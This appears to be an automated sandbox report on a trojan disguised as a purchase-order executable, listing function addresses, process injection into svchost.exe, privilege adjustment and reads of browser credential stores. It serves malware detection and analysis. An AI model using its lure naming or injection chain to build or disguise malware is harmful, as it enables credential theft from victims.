Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D65520	0_2_00D65520
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D77696	0_2_00D77696
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D65760	0_2_00D65760
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D71978	0_2_00D71978
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D5FCE0	0_2_00D5FCE0
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DD7DDB	0_2_00DD7DDB
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D71D90	0_2_00D71D90
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D7BDA6	0_2_00D7BDA6
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D63FE0	0_2_00D63FE0
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D5DF00	0_2_00D5DF00
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0155F310	0_2_0155F310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418B23	1_2_00418B23
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401190	1_2_00401190
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042F223	1_2_0042F223
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004102DF	1_2_004102DF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004102E3	1_2_004102E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402A8B	1_2_00402A8B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402A90	1_2_00402A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004023F0	1_2_004023F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E4F3	1_2_0040E4F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00410503	1_2_00410503
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416D1F	1_2_00416D1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416D23	1_2_00416D23
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E643	1_2_0040E643
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E637	1_2_0040E637
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402FF0	1_2_00402FF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FA352	1_2_031FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032003E6	1_2_032003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E3F0	1_2_0314E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C02C0	1_2_031C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DA118	1_2_031DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130100	1_2_03130100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C8158	1_2_031C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032001AA	1_2_032001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F41A2	1_2_031F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F81CC	1_2_031F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03164750	1_2_03164750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313C7C0	1_2_0313C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315C6E0	1_2_0315C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140535	1_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03200591	1_2_03200591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E4420	1_2_031E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F2446	1_2_031F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EE4F6	1_2_031EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FAB40	1_2_031FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F6BD7	1_2_031F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03156962	1_2_03156962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0320A9A6	1_2_0320A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314A840	1_2_0314A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03142840	1_2_03142840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031268B8	1_2_031268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E8F0	1_2_0316E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03160F30	1_2_03160F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E2F30	1_2_031E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03182F28	1_2_03182F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B4F40	1_2_031B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BEFA0	1_2_031BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03132FC8	1_2_03132FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314CFE0	1_2_0314CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FEE26	1_2_031FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140E59	1_2_03140E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03152E90	1_2_03152E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FCE93	1_2_031FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FEEDB	1_2_031FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DCD1F	1_2_031DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314AD00	1_2_0314AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03158DBF	1_2_03158DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313ADE0	1_2_0313ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140C00	1_2_03140C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0CB5	1_2_031E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130CF2	1_2_03130CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F132D	1_2_031F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312D34C	1_2_0312D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0318739A	1_2_0318739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031452A0	1_2_031452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315B2C0	1_2_0315B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E12ED	1_2_031E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0320B16B	1_2_0320B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312F172	1_2_0312F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0317516C	1_2_0317516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314B1B0	1_2_0314B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EF0CC	1_2_031EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031470C0	1_2_031470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F70E9	1_2_031F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FF0E0	1_2_031FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FF7B0	1_2_031FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03185630	1_2_03185630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F16CC	1_2_031F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F7571	1_2_031F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DD5B0	1_2_031DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032095C3	1_2_032095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FF43F	1_2_031FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03131460	1_2_03131460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FFB76	1_2_031FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315FB80	1_2_0315FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B5BF0	1_2_031B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0317DBF9	1_2_0317DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FFA49	1_2_031FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F7A46	1_2_031F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B3A6C	1_2_031B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DDAAC	1_2_031DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03185AA0	1_2_03185AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E1AA3	1_2_031E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EDAC6	1_2_031EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D5910	1_2_031D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03149950	1_2_03149950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315B950	1_2_0315B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AD800	1_2_031AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031438E0	1_2_031438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FFF09	1_2_031FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03141F92	1_2_03141F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FFFB1	1_2_031FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03103FD2	1_2_03103FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03103FD5	1_2_03103FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03149EB0	1_2_03149EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F1D5A	1_2_031F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03143D40	1_2_03143D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F7D73	1_2_031F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315FDC0	1_2_0315FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B9C32	1_2_031B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FFCF2	1_2_031FFCF2
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0324A352	10_2_0324A352
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_032503E6	10_2_032503E6
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0319E3F0	10_2_0319E3F0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03230274	10_2_03230274
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_032102C0	10_2_032102C0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03180100	10_2_03180100
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0322A118	10_2_0322A118
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03218158	10_2_03218158
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_032441A2	10_2_032441A2
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_032501AA	10_2_032501AA
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_032481CC	10_2_032481CC
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03222000	10_2_03222000
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031B4750	10_2_031B4750
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03190770	10_2_03190770
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031AC6E0	10_2_031AC6E0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03190535	10_2_03190535
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03250591	10_2_03250591
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03234420	10_2_03234420
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03242446	10_2_03242446
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0323E4F6	10_2_0323E4F6
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0324AB40	10_2_0324AB40
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03246BD7	10_2_03246BD7
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0318EA80	10_2_0318EA80
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031A6962	10_2_031A6962
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0325A9A6	10_2_0325A9A6
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031929A0	10_2_031929A0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0319A840	10_2_0319A840
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03192840	10_2_03192840
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031768B8	10_2_031768B8
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031BE8F0	10_2_031BE8F0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03232F30	10_2_03232F30
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031B0F30	10_2_031B0F30
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031D2F28	10_2_031D2F28
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03204F40	10_2_03204F40
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0320EFA0	10_2_0320EFA0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03182FC8	10_2_03182FC8
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0319CFE0	10_2_0319CFE0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0324EE26	10_2_0324EE26
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03190E59	10_2_03190E59
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031A2E90	10_2_031A2E90
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0324CE93	10_2_0324CE93
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0324EEDB	10_2_0324EEDB
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0319AD00	10_2_0319AD00
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0322CD1F	10_2_0322CD1F
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031A8DBF	10_2_031A8DBF
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0318ADE0	10_2_0318ADE0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03190C00	10_2_03190C00
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03230CB5	10_2_03230CB5
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03180CF2	10_2_03180CF2
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0324132D	10_2_0324132D
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0317D34C	10_2_0317D34C
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031D739A	10_2_031D739A
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031952A0	10_2_031952A0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_032312ED	10_2_032312ED
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031AB2C0	10_2_031AB2C0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0325B16B	10_2_0325B16B
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0317F172	10_2_0317F172
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C516C	10_2_031C516C
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0319B1B0	10_2_0319B1B0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0324F0E0	10_2_0324F0E0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_032470E9	10_2_032470E9
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031970C0	10_2_031970C0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0323F0CC	10_2_0323F0CC
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0324F7B0	10_2_0324F7B0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031D5630	10_2_031D5630
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_032416CC	10_2_032416CC
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03247571	10_2_03247571
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0322D5B0	10_2_0322D5B0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_032595C3	10_2_032595C3
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0324F43F	10_2_0324F43F
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03181460	10_2_03181460
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0324FB76	10_2_0324FB76
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031AFB80	10_2_031AFB80
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03205BF0	10_2_03205BF0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031CDBF9	10_2_031CDBF9
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03203A6C	10_2_03203A6C
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03247A46	10_2_03247A46
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0324FA49	10_2_0324FA49
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03231AA3	10_2_03231AA3
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0322DAAC	10_2_0322DAAC
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031D5AA0	10_2_031D5AA0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0323DAC6	10_2_0323DAC6
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03225910	10_2_03225910
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03199950	10_2_03199950
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031AB950	10_2_031AB950
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031FD800	10_2_031FD800
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031938E0	10_2_031938E0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0324FF09	10_2_0324FF09
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03191F92	10_2_03191F92
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0324FFB1	10_2_0324FFB1
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03153FD5	10_2_03153FD5
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03153FD2	10_2_03153FD2
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03199EB0	10_2_03199EB0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03247D73	10_2_03247D73
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03193D40	10_2_03193D40
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03241D5A	10_2_03241D5A
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031AFDC0	10_2_031AFDC0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03209C32	10_2_03209C32
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0324FCF2	10_2_0324FCF2
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_008821F0	10_2_008821F0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0087D06C	10_2_0087D06C
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0087D070	10_2_0087D070
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0087B280	10_2_0087B280
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0087D290	10_2_0087D290
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0087B3C4	10_2_0087B3C4
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0087B3D0	10_2_0087B3D0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_008858B0	10_2_008858B0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_00883AAC	10_2_00883AAC
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_00883AB0	10_2_00883AB0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0089BFB0	10_2_0089BFB0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_02EDE204	10_2_02EDE204
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_02EDE323	10_2_02EDE323
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_02EDE6BC	10_2_02EDE6BC
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_02EDD788	10_2_02EDD788
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_02EDE48B	10_2_02EDE48B

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0312B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03175130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 031BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03187E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 031AEA12 appears 86 times
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: String function: 031D7E54 appears 111 times
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: String function: 031C5130 appears 58 times
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: String function: 031FEA12 appears 86 times
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: String function: 0317B970 appears 280 times
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: String function: 0320F290 appears 105 times
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: String function: 00D78900 appears 42 times
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: String function: 00D57DE1 appears 35 times
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: String function: 00D70AE3 appears 70 times

Source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1168132620.0000000003E6D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PURCHASE ORDER N0259305-06SN.exe
Source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1168420752.0000000003CC3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PURCHASE ORDER N0259305-06SN.exe

Source: PURCHASE ORDER N0259305-06SN.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@20/8

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00DBA06A GetLastError,FormatMessageW,

0_2_00DBA06A

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DA81CB AdjustTokenPrivileges,CloseHandle,		0_2_00DA81CB
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DA87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00DA87E1

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00DBB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00DBB3FB

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00DCEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00DCEE0D

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00DBC397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_00DBC397

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00D54E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00D54E89

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

File created: C:\Users\user\AppData\Local\Temp\aut96C0.tmp

Jump to behavior

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: HOSTNAME.EXE, 0000000A.00000003.1673421652.0000000002D72000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3619793906.0000000002D72000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000003.1673150890.0000000002D51000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PURCHASE ORDER N0259305-06SN.exe	Virustotal: Detection: 51%
Source: PURCHASE ORDER N0259305-06SN.exe	ReversingLabs: Detection: 65%

Source: unknown	Process created: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe"
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe"
